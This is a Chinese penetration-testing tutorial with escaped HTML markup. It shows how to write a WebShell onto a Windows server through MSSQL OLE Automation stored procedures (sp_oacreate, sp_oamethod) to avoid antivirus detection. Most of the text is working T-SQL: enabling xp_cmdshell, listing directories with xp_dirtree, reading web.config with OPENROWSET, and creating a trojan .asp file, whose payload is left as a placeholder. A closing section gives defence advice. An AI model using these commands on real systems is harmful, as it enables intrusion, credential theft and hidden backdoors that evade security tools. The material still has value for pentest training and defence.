绕过杀软的另类思路：通过OLE自动化存储过程写入WebShell<\/h1>

0x1 背景介绍<\/h2>
在渗透测试过程中，当获取到MSSQL数据库凭据后，常见的提权方法是使用xp_cmdshell执行系统命令。然而，当目标系统存在杀毒软件时，这种方法往往会被拦截。本文介绍一种绕过杀软的替代方法：使用OLE自动化存储过程写入WebShell。<\/p>

0x2 前置条件<\/h2>

数据库权限要求<\/strong>：<\/p>

必须是sysadmin角色成员<\/li>
可通过以下SQL语句验证：
Select<\/span> IS_SRVROLEMEMBER('sysadmin'<\/span>); <\/span><\/span><\/code><\/pre>返回1表示是sysadmin角色成员<\/li> <\/ul> <\/li> 需要获取的信息<\/strong>：<\/p> 网站绝对路径<\/li> 数据库支持OLE自动化存储过程<\/li> <\/ul> <\/li> <\/ol> 0x3 传统方法尝试与失败<\/h2> 3.1 xp_cmdshell方法<\/h3> 启用xp_cmdshell：<\/p> EXEC<\/span> sp_configure 'show advanced options'<\/span>, 1<\/span>; <\/span><\/span>RECONFIGURE; <\/span><\/span>EXEC<\/span> sp_configure 'xp_cmdshell'<\/span>, 1<\/span>; <\/span><\/span>RECONFIGURE; <\/span><\/span><\/code><\/pre><\/li> 执行命令测试：<\/p> exec<\/span> master..xp_cmdshell 'whoami'<\/span>; <\/span><\/span><\/code><\/pre> 可能失败原因：权限不足<\/li> 杀软\/防火墙拦截<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 3.2 获取网站路径<\/h3> 使用xp_dirtree获取目录结构：<\/p> -- 列出C盘下Temp目录所有文件 <\/span><\/span><\/span><\/span>EXEC<\/span> xp_dirtree 'C:\Temp'<\/span>, 1<\/span>, 1<\/span>; <\/span><\/span> <\/span><\/span>-- 列出C盘下Temp目录所有文件夹 <\/span><\/span><\/span><\/span>EXEC<\/span> xp_dirtree 'C:\Temp'<\/span>, 1<\/span>; <\/span><\/span><\/code><\/pre>3.3 读取文件内容<\/h3> 使用OPENROWSET读取文件：<\/p> -- 启用Ad Hoc Distributed Queries <\/span><\/span><\/span><\/span>EXEC<\/span> sp_configure 'show advanced options'<\/span>, 1<\/span>; <\/span><\/span>RECONFIGURE; <\/span><\/span>EXEC<\/span> sp_configure 'Ad Hoc Distributed Queries'<\/span>, 1<\/span>; <\/span><\/span>RECONFIGURE; <\/span><\/span> <\/span><\/span>-- 读取文件内容 <\/span><\/span><\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> OPENROWSET(BULK 'd:\TwApi\Wuye\web.config'<\/span>, SINGLE_CLOB) AS<\/span> FileContent; <\/span><\/span><\/code><\/pre>0x4 OLE自动化存储过程写入WebShell<\/h2> 4.1 启用OLE自动化存储过程<\/h3> EXEC<\/span> sp_configure 'Ole Automation Procedures'<\/span>, 1<\/span>; <\/span><\/span>RECONFIGURE; <\/span><\/span><\/code><\/pre>4.2 写入WebShell<\/h3> declare<\/span> @<\/span>o int, @<\/span>f int, @<\/span>t int, @<\/span>ret int <\/span><\/span>exec<\/span> sp_oacreate 'scripting.filesystemobject'<\/span>, @<\/span>o out<\/span> <\/span><\/span>exec<\/span> sp_oamethod @<\/span>o, 'createtextfile'<\/span>, @<\/span>f out<\/span>, 'd:\xxxx\muma.asp'<\/span>, 1<\/span> <\/span><\/span>exec<\/span> @<\/span>ret =<\/span> sp_oamethod @<\/span>f, 'writeline'<\/span>, NULL<\/span>,'木马文件内容'<\/span> <\/span><\/span><\/code><\/pre>4.3 方法优势<\/h3> 绕过杀软检测<\/strong>：<\/p> 通过数据库服务权限(通常是系统级别)创建文件<\/li> 没有典型的网络传输过程，规避杀软监控<\/li> <\/ul> <\/li> 文件持久性<\/strong>：<\/p> 杀软可能无法直接操作或修改数据库生成的文件<\/li> 相比普通上传的文件(继承当前用户权限)更难被查杀<\/li> <\/ul> <\/li> <\/ol> 0x5 防御建议<\/h2> 数据库安全配置<\/strong>：<\/p> 禁用不必要的存储过程(xp_cmdshell、OLE自动化等)<\/li> 限制sysadmin角色成员数量<\/li> <\/ul> <\/li> 文件系统监控<\/strong>：<\/p> 监控Web目录下的文件创建操作<\/li> 设置适当的文件权限，防止数据库账户写入Web目录<\/li> <\/ul> <\/li> 杀毒软件配置<\/strong>：<\/p> 确保杀软具有足够权限扫描所有文件<\/li> 监控异常的文件创建行为，而非仅依赖特征检测<\/li> <\/ul> <\/li> <\/ol> 0x6 总结<\/h2> 通过OLE自动化存储过程写入WebShell是一种有效的绕过杀软的方法，其关键在于：<\/p> 利用数据库服务的高权限创建文件<\/li> 绕过常规的文件传输监控机制<\/li> 创建的文件可能因权限问题难以被杀软处理<\/li> <\/ol> 这种方法适用于当传统方法(xp_cmdshell等)被拦截时的替代方案，但需要满足特定的前置条件。防御方应关注数据库安全配置和文件系统监控，以防范此类攻击。<\/p>